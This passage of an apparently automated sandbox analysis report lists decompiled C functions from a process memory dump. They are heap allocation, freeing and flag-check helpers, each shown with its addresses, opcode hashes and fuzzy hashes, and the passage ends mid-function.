                                                  • Opcode ID: e7b1a151a30e4cd42cf12e0b25047b23d98c7a685b3010b6248e88946c3b4b02
                                                  • Instruction ID: 211e93a8744235b627f4770d322d27a6ebab796a70bb8f06f6665502fbc67407
                                                  • Opcode Fuzzy Hash: e7b1a151a30e4cd42cf12e0b25047b23d98c7a685b3010b6248e88946c3b4b02
                                                  • Instruction Fuzzy Hash: 25F05EB0A5425AABDB10EBA8D906A6E77A8BF54304F440559BA059B380EB74D900C794
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015D746D Relevance: .0, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E015D746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E015CEB70(__ecx, 0x16a79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E015F95D0();
							L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                  0x015d746d
                                                  0x015d746d
                                                  0x015d746d
                                                  0x015d7471
                                                  0x015d7488
                                                  0x0161f92d
                                                  0x015d748e
                                                  0x015d7491
                                                  0x015d7495
                                                  0x0161f937
                                                  0x0161f93a
                                                  0x0161f94e
                                                  0x0161f953
                                                  0x0161f956
                                                  0x0161f956
                                                  0x015d7495
                                                  0x00000000
                                                  0x015d7488
                                                  0x015d7473
                                                  0x015d7478
                                                  0x015d747d
                                                  0x015d7481
                                                  0x00000000
                                                  0x015d7481
                                                  0x015d747d
                                                  0x015d747a
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0591066d89003e7b98dc908e18cd9929b2f0e60864cf53ce8f17878c064d72d6
                                                  • Instruction ID: d53fcb35ea0bdc0caf64c207dedab6d5f583aac53b33cf6ac03bd2ea7fa2fd90
                                                  • Opcode Fuzzy Hash: 0591066d89003e7b98dc908e18cd9929b2f0e60864cf53ce8f17878c064d72d6
                                                  • Instruction Fuzzy Hash: 6FF0BE34905146AADF23AB7CC840B7DBFB2BF48218F580A9AE951AF161E72598018BD5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01688CD6 Relevance: .0, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 36%
                                                  			E01688CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x16ad360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E015D7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E015FB640(E015F9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                  0x01688ce5
                                                  0x01688ced
                                                  0x01688cf0
                                                  0x01688cfb
                                                  0x01688d0d
                                                  0x01688cfd
                                                  0x01688d06
                                                  0x01688d06
                                                  0x01688d18
                                                  0x01688d19
                                                  0x01688d1b
                                                  0x01688d20
                                                  0x01688d33

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d3b3a6a9e9a5c0a27ef8b2a85e6998ec2eb39c7d32596da122fc7a62a2f7d905
                                                  • Instruction ID: ff5d65175910bc073530c433729f668d5fe121c34c54b01ca0285aebfb7d9a38
                                                  • Opcode Fuzzy Hash: d3b3a6a9e9a5c0a27ef8b2a85e6998ec2eb39c7d32596da122fc7a62a2f7d905
                                                  • Instruction Fuzzy Hash: 92F08271A0460AEBDB04EFA9D945E6E77B8FF59204F500199F916EB381EA34D900CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015B4F2E Relevance: .0, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E015B4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E016888F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E015DC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1591030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                  0x015b4f2e
                                                  0x015b4f34
                                                  0x015b4f38
                                                  0x01610b85
                                                  0x01610b85
                                                  0x01610b89
                                                  0x01610b9a
                                                  0x01610b9a
                                                  0x01610b9f
                                                  0x00000000
                                                  0x01610b9f
                                                  0x01610b94
                                                  0x01610b98
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01610b98
                                                  0x015b4f3e
                                                  0x015b4f48
                                                  0x00000000
                                                  0x015b4f6e
                                                  0x00000000
                                                  0x015b4f70

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a3f1873b919fc210cdf3a8ee4c619a22828393579443405e82a0e5b31f68fec5
                                                  • Instruction ID: 87f484dca126187270ad4a5c7e77b476db53e3b120e666b823787a5fb26a6f25
                                                  • Opcode Fuzzy Hash: a3f1873b919fc210cdf3a8ee4c619a22828393579443405e82a0e5b31f68fec5
                                                  • Instruction Fuzzy Hash: D1F0E2725216968FDF72DF1CC984B22B7D8FB10778F494466E4068BB2AC765ECC0C640
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015EA44B Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E015EA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x16a7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L015D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E015FFA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                  0x015ea44b
                                                  0x015ea453
                                                  0x015ea472
                                                  0x015ea476
                                                  0x00000000
                                                  0x015ea493
                                                  0x015ea47a
                                                  0x015ea47f
                                                  0x015ea486
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c49bd59996d0244e61c11365a1ed897f32775f80aa996c485a81b641d555f0a8
                                                  • Instruction ID: 1508ee079de15a3240f1bfe9c08b6a64cf98bcbb793ee854fcef1a58bb6f529f
                                                  • Opcode Fuzzy Hash: c49bd59996d0244e61c11365a1ed897f32775f80aa996c485a81b641d555f0a8
                                                  • Instruction Fuzzy Hash: 7FE09273A01422ABD3225F18AC00F66739DEBE4651F0A4439E605CB214D668DD11C7E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015BF358 Relevance: .0, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 79%
                                                  			E015BF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E015EF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L015D4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                  0x015bf35d
                                                  0x015bf361
                                                  0x015bf367
                                                  0x015bf372
                                                  0x015bf38c
                                                  0x015bf38c
                                                  0x015bf394

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                  • Instruction ID: 0a507fd38bfb439ebc129662e2dabdb62b6b89abc4d432617611a0208d0e1106
                                                  • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                  • Instruction Fuzzy Hash: AAE0D832A41119FBDB3196DD9D05FAABFACEB98A60F000156BA04DB150D5719D00C3D0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015CFF60 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E015CFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x15911a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E016888F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E015D0050(_t14);
				}
			}










                                                  0x015cff66
                                                  0x015cff6b
                                                  0x00000000
                                                  0x015cff8f
                                                  0x00000000
                                                  0x015cff8f

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 933bac430f3476b36c87bc068460b6d3163397e7a21ded40dcead923be33cb11
                                                  • Instruction ID: b12972821102d5a4ebcb14e6be488330981e3816abf4e4039154519ee99788ad
                                                  • Opcode Fuzzy Hash: 933bac430f3476b36c87bc068460b6d3163397e7a21ded40dcead923be33cb11
                                                  • Instruction Fuzzy Hash: F7E0DFB0205206EFDB36DF99D080F2D3B9EFB52A21F1A841FE0184F102D621DA80C3CA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 016441E8 Relevance: .0, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 82%
                                                  			E016441E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x16908f0);
				_t5 = E0160D08C(__ebx, __edi, __esi);
				if( *0x16a87ec == 0) {
					E015CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x16a87ec == 0) {
						 *0x16a87f0 = 0x16a87ec;
						 *0x16a87ec = 0x16a87ec;
						 *0x16a87e8 = 0x16a87e4;
						 *0x16a87e4 = 0x16a87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L01644248();
				}
				return E0160D0D1(_t5);
			}





                                                  0x016441e8
                                                  0x016441ea
                                                  0x016441ef
                                                  0x016441fb
                                                  0x01644206
                                                  0x0164420b
                                                  0x01644216
                                                  0x0164421d
                                                  0x01644222
                                                  0x0164422c
                                                  0x01644231
                                                  0x01644231
                                                  0x01644236
                                                  0x0164423d
                                                  0x0164423d
                                                  0x01644247

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9f6c9c74b4bbe943bdda28db181adf3e4f1d9b3fbb61a7dfb4110b9533fd6609
                                                  • Instruction ID: df2aa88f8733f0e96b4ef757b659aa5ffa7acee571726c7efd8d054f2f4eb98a
                                                  • Opcode Fuzzy Hash: 9f6c9c74b4bbe943bdda28db181adf3e4f1d9b3fbb61a7dfb4110b9533fd6609
                                                  • Instruction Fuzzy Hash: 76F01578920701CFCBB1EFA99D017AD3AACF756352F80A11AD10587288CB7499B0CF05
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0166D380 Relevance: .0, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0166D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L015BE8B0(__ecx, _a4, 0xfff);
					L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                  0x0166d38a
                                                  0x0166d39b
                                                  0x0166d3b1
                                                  0x00000000
                                                  0x0166d3b6
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                  • Instruction ID: 8b8387b0f647a62abd80bc9365f6dcd7370941773462e2d4a819d8dfcec94a53
                                                  • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                  • Instruction Fuzzy Hash: CFE0C231380606BBDB225E88CC00FA9BB1AEBA07A0F104031FE486E790CA719C92D7C4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015EA185 Relevance: .0, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E015EA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x16a67e4 >= 0xa) {
					if(_t5 < 0x16a6800 || _t5 >= 0x16a6900) {
						return L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E015D0010(0x16a67e0, _t5);
				}
			}





                                                  0x015ea190
                                                  0x015ea1a6
                                                  0x015ea1c2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015ea192
                                                  0x015ea192
                                                  0x015ea19f
                                                  0x015ea19f

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8346dbc0f4b9f419df286f99b8bd402c9bda9f7774244b9f73ee7da67122e7f2
                                                  • Instruction ID: c58eb3e5515b189e3c22e22acb386a59806493ba890d06714e0c16a6f3928bd2
                                                  • Opcode Fuzzy Hash: 8346dbc0f4b9f419df286f99b8bd402c9bda9f7774244b9f73ee7da67122e7f2
                                                  • Instruction Fuzzy Hash: 9ED0C7619220016AC63D2B24CC18B362A92F7C4660FAA480CE2134F9A4EA60CCE08A09
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015E16E0 Relevance: .0, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E015E16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E015E1710(0x16a67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L015D4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                  0x015e16e8
                                                  0x015e16ef
                                                  0x015e16f3
                                                  0x015e16fe
                                                  0x00000000
                                                  0x015e1700
                                                  0x015e170d
                                                  0x015e170d
                                                  0x015e16f2
                                                  0x015e16f2
                                                  0x015e16f2
                                                  0x015e16f2

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b59fe217cf85e949389682164c77640f69d30179657e2de2ad170706cfba174f
                                                  • Instruction ID: 5091b352614ffa4b66f0d349b4a9bedfc694d5b35a2259364264255fed392b07
                                                  • Opcode Fuzzy Hash: b59fe217cf85e949389682164c77640f69d30179657e2de2ad170706cfba174f
                                                  • Instruction Fuzzy Hash: 5CD0A73124060292EA2D5F189C88B292691FBD4BC1F38005CF2074DCD0CFB0CC92E848
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 016353CA Relevance: .0, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E016353CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E015CEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                  0x016353ca
                                                  0x016353ce
                                                  0x016353d9
                                                  0x016353de
                                                  0x016353e1
                                                  0x016353e1
                                                  0x016353e6
                                                  0x016353f3
                                                  0x00000000
                                                  0x016353f8
                                                  0x016353fb

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                  • Instruction ID: fdb6e4e1fadc678342208d020e00eea2e5a9c8f06c3b063f43bbde79e32ea86c
                                                  • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                  • Instruction Fuzzy Hash: BAE046329006819BDB12DB88CA50F5ABBF5FB84B00F150408A0095F620C624AC00CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015CAAB0 Relevance: .0, Instructions: 12COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E015CAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                  0x015caab6
                                                  0x015caabb
                                                  0x0161a442
                                                  0x00000000
                                                  0x0161a448
                                                  0x0161a454
                                                  0x0161a454
                                                  0x015caac1
                                                  0x015caac1
                                                  0x015caac6
                                                  0x015caac6

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                  • Instruction ID: f388fbc9219c015856004b843c578e71b70ccd5c93964eadd4a3f5cc6c86d42a
                                                  • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                  • Instruction Fuzzy Hash: 39D0C935352980CFE617CF4CC954B0537A4BB04B44FC90490E540CB722E72CD940CA00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015E35A1 Relevance: .0, Instructions: 12COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E015E35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E015CEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                  0x015e35a1
                                                  0x015e35a1
                                                  0x015e35a5
                                                  0x015e35ab
                                                  0x015e35ab
                                                  0x015e35b5
                                                  0x00000000
                                                  0x015e35c1
                                                  0x015e35b7

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                  • Instruction ID: 693839e085007b0e120551879f8f00a9d90505dd8cca2008a726473dbd7e9e0b
                                                  • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                  • Instruction Fuzzy Hash: 07D0A931C011829EEB8AAB54C21C77C3BF3FB02308F58206B80020FA52C33A4A0AC600
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015BDB40 Relevance: .0, Instructions: 11COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E015BDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L015D4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                  0x015bdb4d
                                                  0x015bdb54
                                                  0x015bdb5f
                                                  0x015bdb56
                                                  0x015bdb56
                                                  0x015bdb5c
                                                  0x015bdb5c

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                  • Instruction ID: 93ded17c9626e66dbd54b8f4b8706691ff4e0477b4f51f431ca560c63d470147
                                                  • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                  • Instruction Fuzzy Hash: C3C08C30280A02ABEB321F24CD41B403AA0BB50B49F4400A06301DE4F0DB78D801EA00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0163A537 Relevance: .0, Instructions: 11COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0163A537(intOrPtr _a4, intOrPtr _a8) {

				return L015D8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                  0x0163a553

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                  • Instruction ID: 6b1d81090013d5d58d611f6186b125b9ce6c64c1b52710eb237b8c0f1370c89b
                                                  • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                  • Instruction Fuzzy Hash: 6CC01232080248BBCB226E85CC00F067B2AFBA4B60F008010FA080E5608632E970EB84
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015D3A1C Relevance: .0, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E015D3A1C(intOrPtr _a4) {
				void* _t5;

				return L015D4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                  0x015d3a35

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                  • Instruction ID: 978bb76ee6b5f76e0504faf3ee780f968a5da0b0a257965d0d06a39bb36ebc47
                                                  • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                  • Instruction Fuzzy Hash: CDC08C32080248BBC7226E45DC00F017B29E7A0B60F000020B6040A9608532EC60D688
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015BAD30 Relevance: .0, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E015BAD30(intOrPtr _a4) {

				return L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                  0x015bad49

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                  • Instruction ID: e1af29de70ba8ed6f8c5262cf4ba7af8fda9eef8b07fc5b43a29e9e794bb4a36
                                                  • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                  • Instruction Fuzzy Hash: C4C08C32080248BBC7226A49CD00F01BB29E7A4B60F010020B6040A6618932E861D688
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015E36CC Relevance: .0, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E015E36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
